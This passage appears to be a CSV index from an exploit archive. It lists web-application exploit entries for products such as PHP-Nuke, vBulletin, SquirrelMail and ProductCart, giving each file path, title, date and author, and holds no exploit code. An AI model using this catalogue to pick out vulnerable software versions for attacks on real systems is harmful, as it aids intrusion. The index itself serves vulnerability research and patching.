+22559,exploits/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",webapps,cgi, +22572,exploits/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Member_HTML.cgi' Command Execution",2003-05-08,"Revin Aldi",webapps,cgi, +22577,exploits/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion",2003-05-09,"Charles Reinold",webapps,php, +22578,exploits/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion",2003-05-09,"Charles Reinold",webapps,php, +22579,exploits/php/webapps/22579.txt,"Phorum 3.4.x - 'Message Form' HTML Injection",2003-05-09,WiciU,webapps,php, +22583,exploits/asp/webapps/22583.pl,"Snitz Forums 2000 - 'register.asp' SQL Injection",2003-05-10,sharpiemarker,webapps,asp, +22588,exploits/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Cross-Site Scripting",2003-05-12,"Julio Cesar",webapps,cgi, +22589,exploits/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",webapps,php, +22590,exploits/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,webapps,php, +22592,exploits/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' File Disclosure",2003-05-12,"Julio Cesar",webapps,cgi, +22595,exploits/php/webapps/22595.txt,"PHP-Nuke 6.5 - 'modules.php?Username' Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",webapps,php, +22597,exploits/php/webapps/22597.txt,"PHP-Nuke 6.5 (Multiple Downloads Module) - SQL Injection",2003-05-13,"Albert Puigsech Galicia",webapps,php, +22598,exploits/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",webapps,php, +22599,exploits/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",webapps,php, +22600,exploits/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,webapps,php, +22603,exploits/php/webapps/22603.txt,"PHP-Proxima - 'autohtml.php' Information Disclosure",2003-05-14,"Mind Warper",webapps,php, +22605,exploits/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,webapps,php, +22606,exploits/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,webapps,php, +22607,exploits/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",webapps,php, +22612,exploits/php/webapps/22612.txt,"ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,webapps,php, +22618,exploits/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,webapps,php, +22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php, +22632,exploits/php/webapps/22632.txt,"XMB Forum 1.8 - 'member.php' Cross-Site Scripting",2003-06-22,"Marc Ruef",webapps,php, +22639,exploits/asp/webapps/22639.txt,"IISProtect 2.1/2.2 - Web Administration Interface SQL Injection",2003-05-23,Gyrniff,webapps,asp, +22641,exploits/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,webapps,php, +22642,exploits/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - 'admin_iplog.php' Arbitrary PHP Execution",2003-05-24,euronymous,webapps,php, +22651,exploits/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",webapps,php, +22654,exploits/php/webapps/22654.txt,"Bananadance Wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,webapps,php, +22656,exploits/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",webapps,php, +22663,exploits/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Escalation",2003-05-27,"Peter Winter-Smith",webapps,php, +22669,exploits/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",webapps,cgi, +22671,exploits/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - 'URI' File Disclosure",2003-05-29,pokleyzz,webapps,php, +22672,exploits/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,webapps,php, +22673,exploits/asp/webapps/22673.txt,"philboard 1.14 - 'philboard_admin.asp' Authentication Bypass",2003-05-29,aresu@bosen.net,webapps,asp, +22675,exploits/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,webapps,php, +22684,exploits/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,webapps,php, +22687,exploits/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,webapps,php, +22688,exploits/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion",2003-05-29,JeiAr,webapps,cgi, +22689,exploits/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Remote File Inclusion",2003-05-29,JeiAr,webapps,cgi, +22692,exploits/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface 'VS_Diag.cgi' Cross-Site Scripting",2003-05-29,"Hugo Vazquez",webapps,cgi, +22693,exploits/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",webapps,php, +22697,exploits/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,webapps,asp, +22698,exploits/asp/webapps/22698.pl,"WebCortex WebStores2000 - SQL Injection",2003-05-31,Bosen,webapps,asp, +22702,exploits/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 - 'Expanded.php' Remote Command Execution",2003-06-02,_6mO_HaCk,webapps,php, +22704,exploits/php/webapps/22704.txt,"Webchat 2.0 Module - Full Path Disclosure",2003-06-02,"Rynho Zeros Web",webapps,php, +22705,exploits/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - 'Expanded.php' Directory Traversal",2003-06-02,_6mO_HaCk,webapps,php, +22708,exploits/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,webapps,php, +22709,exploits/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,webapps,php, +22713,exploits/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,webapps,php, +22710,exploits/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection / Authentication Bypass",2012-11-14,d3b4g,webapps,php, +22711,exploits/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,webapps,php, +22712,exploits/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,webapps,php, +22715,exploits/php/webapps/22715.txt,"WebChat 2.0 - 'users.php?Database Username Disclosure",2003-06-02,"Rynho Zeros Web",webapps,php, +22716,exploits/php/webapps/22716.txt,"WebChat 2.0 - 'users.php' Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",webapps,php, +22717,exploits/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",webapps,php, +22724,exploits/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injections",2003-06-04,"Paul Craig",webapps,asp, +22725,exploits/php/webapps/22725.txt,"PHP 4 - 'PHPInfo()' Cross-Site Scripting",2002-10-12,"Matthew Murphy",webapps,php, +22730,exploits/asp/webapps/22730.txt,"Mailtraq 2.2 - 'Browse.asp' Cross-Site Scripting",2003-06-04,"Ziv Kamir",webapps,asp, +22731,exploits/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",webapps,asp, +22735,exploits/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,webapps,php, +22736,exploits/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,webapps,php, +22741,exploits/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",webapps,php, +22742,exploits/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,webapps,php, +22743,exploits/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - 'Admin.cgi' Directory Traversal",2003-06-05,"Paul Craig",webapps,cgi, +22744,exploits/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,webapps,asp, +22746,exploits/asp/webapps/22746.txt,"Maxwebportal 1.30 - 'search.asp?Search' Cross-Site Scripting",2003-06-06,JeiAr,webapps,asp, +22747,exploits/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,webapps,asp, +22750,exploits/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion",2003-06-06,farking,webapps,php, +22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java, +22760,exploits/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 - VDS Control Panel Account Configuration Modification",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22761,exploits/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",webapps,php, +22762,exploits/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22829,exploits/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,webapps,php,80 +22767,exploits/php/webapps/22767.txt,"PostNuke 0.723 - 'user.php' UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",webapps,php, +22770,exploits/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,webapps,cgi, +22766,exploits/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php?question' SQL Injection",2012-11-16,unsuprise,webapps,php, +22772,exploits/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,webapps,cgi, +22776,exploits/php/webapps/22776.txt,"PMachine 2.2.1 - '/Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,webapps,php, +22777,exploits/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",webapps,cgi, +22778,exploits/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - 'search.asp' Cross-Site Scripting",2003-06-16,JeiAr,webapps,asp, +22791,exploits/php/webapps/22791.txt,"SquirrelMail 1.2.11 - 'move_messages.php' Arbitrary File Moving",2003-06-17,dr_insane,webapps,php, +22792,exploits/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin - 'options.php' Arbitrary Admin Account Creation",2003-06-17,dr_insane,webapps,php, +22793,exploits/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Multiple Vulnerabilities",2003-06-17,dr_insane,webapps,php, +22798,exploits/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",webapps,php, +22799,exploits/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",webapps,cgi, +22804,exploits/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",webapps,cgi, +22805,exploits/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",webapps,jsp, +22808,exploits/php/webapps/22808.txt,"pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22809,exploits/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script 'sfx' Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22810,exploits/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",webapps,php, +22818,exploits/php/webapps/22818.txt,"Tutos 1.1 - 'File_Select.php' Cross-Site Scripting",2003-06-20,"François SORIN",webapps,php, +22819,exploits/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",webapps,php, +22820,exploits/php/webapps/22820.txt,"XMB Forum 1.8 - 'member.php?member' Cross-Site Scripting",2003-06-23,"Knight Commander",webapps,php, +22821,exploits/php/webapps/22821.txt,"XMB Forum 1.8 - 'buddy.php?action' Cross-Site Scripting",2003-06-23,"Knight Commander",webapps,php, +22826,exploits/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,webapps,php, +22828,exploits/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",webapps,php, +22841,exploits/php/webapps/22841.txt,"iXmail 0.2/0.3 - 'iXmail_NetAttach.php' File Deletion",2003-06-26,leseulfrog,webapps,php, +22842,exploits/php/webapps/22842.txt,"CutePHP CuteNews 1.3 - HTML Injection",2003-06-29,"Peter Winter-Smith",webapps,php, +22843,exploits/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",webapps,cgi, +22845,exploits/php/webapps/22845.txt,"PABox 1.6 - Password Reset",2003-06-30,silentscripter,webapps,php, +22849,exploits/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 - Cross-Site Scripting",2003-07-02,"SSR Team",webapps,jsp, +22852,exploits/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,webapps,multiple, +22853,exploits/php/webapps/22853.txt,"WordPress Plugin Facebook Survey 1.0 - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",webapps,php, +22857,exploits/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script - Cross-Site Scripting",2003-07-02,"SSR Team",webapps,jsp, +22864,exploits/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - 'Custva.asp' SQL Injection",2003-07-04,Bosen,webapps,asp, +22865,exploits/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection",2003-07-04,Bosen,webapps,asp, +22866,exploits/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 - 'MSG.asp' Cross-Site Scripting",2003-07-05,atomix,webapps,asp, +22868,exploits/asp/webapps/22868.txt,"ProductCart 1.5/1.6/2.0 - File Disclosure",2003-07-05,"Tri Huynh",webapps,asp, +22874,exploits/php/webapps/22874.txt,"CPanel 5.0/5.3/6.x - Admin Interface HTML Injection",2003-07-07,"Ory Segal",webapps,php, +22877,exploits/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,webapps,php, +22879,exploits/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,webapps,windows, +23035,exploits/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,webapps,asp, +23036,exploits/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",webapps,php, +22881,exploits/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,webapps,php, +22885,exploits/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,webapps,asp, +22886,exploits/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - 'download.php' Directory Traversal",2003-07-09,"SSR Team",webapps,php, +22887,exploits/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,webapps,php, +22888,exploits/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)",2003-07-10,"TioEuy & AresU",webapps,asp, +22889,exploits/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)",2003-07-10,"Bosen & TioEuy",webapps,asp, +22895,exploits/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,webapps,asp, +22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php, +22901,exploits/php/webapps/22901.txt,"BlazeBoard 1.0 - Information Disclosure",2003-07-14,JackDaniels,webapps,php, +22906,exploits/php/webapps/22906.txt,"jBilling 3.0.2 - Cross-Site Scripting",2012-11-25,"Woody Hughes",webapps,php, +22907,exploits/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",webapps,php, +22910,exploits/php/webapps/22910.html,"Splatt Forum 3/4 - Post Icon HTML Injection",2003-07-15,Lethalman,webapps,php, +22942,exploits/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Inclusion Information Disclosure",2003-07-21,noconflic,webapps,php, +22948,exploits/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",webapps,php, +22953,exploits/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",webapps,php, +22955,exploits/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",webapps,php, +22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",webapps,php, +22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",webapps,php, +22963,exploits/cgi/webapps/22963.txt,"Softshoe - Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",webapps,cgi, +22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php, +22941,exploits/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal",2003-07-21,gr00vy,webapps,php, +22921,exploits/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,webapps,asp, +22922,exploits/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,webapps,php, +22925,exploits/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - 'Settings.inc.php' Full Path Disclosure",2003-07-17,Bosen,webapps,php, +22927,exploits/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Remote File Inclusion",2003-07-18,PUPET,webapps,php, +22929,exploits/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,webapps,php, +22961,exploits/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",webapps,php, +23008,exploits/php/webapps/23008.txt,"DCForum+ 1.2 - 'Subject' HTML Injection",2003-08-11,G00db0y,webapps,php, +23009,exploits/php/webapps/23009.txt,"Stellar Docs 1.2 - Full Path Disclosure",2003-08-11,G00db0y,webapps,php, +23010,exploits/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,webapps,php, +23011,exploits/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting",2003-08-11,G00db0y,webapps,php, +23012,exploits/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,webapps,php, +23013,exploits/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23014,exploits/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23015,exploits/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - 'fatcat_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23016,exploits/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - 'PAGE_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22936,exploits/php/webapps/22936.txt,"SmartCMS - 'index.php?idx' SQL Injection",2012-11-26,NoGe,webapps,php, +22937,exploits/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,webapps,php, +22960,exploits/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",webapps,php, +22972,exploits/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",webapps,windows, +22977,exploits/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,webapps,php, +22986,exploits/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22990,exploits/php/webapps/22990.txt,"vBulletin 3.0 - 'register.php' HTML Injection",2003-08-06,"Ferruh Mavituna",webapps,php, +22992,exploits/asp/webapps/22992.txt,"IdealBB 1.4.9 - 'error.asp' Cross-Site Scripting",2003-08-07,G00db0y,webapps,asp, +22995,exploits/php/webapps/22995.txt,"C-Cart 1.0 - Full Path Disclosure",2003-08-08,G00db0y,webapps,php, +22997,exploits/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +22998,exploits/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23000,exploits/php/webapps/23000.txt,"geeeekShop 1.4 - Information Disclosure",2003-08-09,G00db0y,webapps,php, +23001,exploits/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting",2003-08-09,"Boy Bear",webapps,php, +23004,exploits/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple Cross-Site Scripting POST Injection Vulnerabilities",2012-11-29,LiquidWorm,webapps,multiple, +23005,exploits/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - Arbitrary File Upload Protection Bypass",2012-11-29,"Soroush Dalili",webapps,asp, +23017,exploits/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - 'PDA_limit' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23018,exploits/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Full Path Disclosure",2003-08-11,"Zone-h Security Team",webapps,php, +23020,exploits/php/webapps/23020.txt,"HostAdmin - Full Path Disclosure",2003-08-12,G00db0y,webapps,php, +23021,exploits/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",webapps,cgi, +23025,exploits/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - 'User.cgi' Cross-Site Scripting",2003-08-13,"Ziv Kamir",webapps,cgi, +23026,exploits/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,webapps,php, +23027,exploits/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",webapps,php, +23028,exploits/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' SQL Injection",2012-11-30,"Yakir Wizman",webapps,php, +23029,exploits/php/webapps/23029.txt,"SmartCMS - '/index.php?menuitem' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",webapps,php, +23032,exploits/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,webapps,asp, +23033,exploits/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,webapps,asp, +23031,exploits/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",webapps,php, +23039,exploits/php/webapps/23039.txt,"Fusion News 3.3 - Unauthorized Account Addition",2003-08-18,DarkKnight,webapps,php, +23055,exploits/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta - HTML Injection",2003-08-23,"Scott M",webapps,asp, +23057,exploits/php/webapps/23057.txt,"newsPHP 216 - Remote File Inclusion",2003-08-25,Officerrr,webapps,php, +23058,exploits/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,webapps,php, +23059,exploits/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 - Information Disclosure",2003-08-25,"cyber talon",webapps,cgi, +23060,exploits/php/webapps/23060.txt,"Py-Membres 4.x - 'Secure.php' Unauthorized Access",2003-08-26,frog,webapps,php, +23061,exploits/php/webapps/23061.txt,"Py-Membres 4.x - 'Pass_done.php' SQL Injection",2003-08-26,frog,webapps,php, +23064,exploits/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access",2003-08-26,frog,webapps,php, +23065,exploits/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - 'LNG' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",webapps,php, +23067,exploits/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - 'Mod' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",webapps,php, +23072,exploits/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",webapps,php, +23084,exploits/php/webapps/23084.txt,"TSguestbook 2.1 - 'Message' HTML Injection",2003-09-01,Trash-80,webapps,php, +23085,exploits/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",webapps,cgi, +23099,exploits/php/webapps/23099.txt,"WebCalendar 0.9.x (Multiple Modules) - SQL Injection",2003-09-03,noconflic,webapps,php, +23103,exploits/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,webapps,php, +23105,exploits/php/webapps/23105.txt,"MyBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,webapps,php, +23106,exploits/php/webapps/23106.txt,"SchoolCMS - Persistent Cross-Site Scripting",2012-12-03,VipVince,webapps,php, +23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple, +23110,exploits/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",webapps,linux, +23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple, +23120,exploits/asp/webapps/23120.txt,"ICQ 2003 - Webfront Guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",webapps,asp, +23125,exploits/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,webapps,php, +23127,exploits/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",webapps,cgi, +23128,exploits/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Full Path Disclosure",2003-09-09,"Bahaa Naamneh",webapps,cgi, +23129,exploits/php/webapps/23129.txt,"Invision Power Board 1.x - 'index.php' showtopic Cross-Site 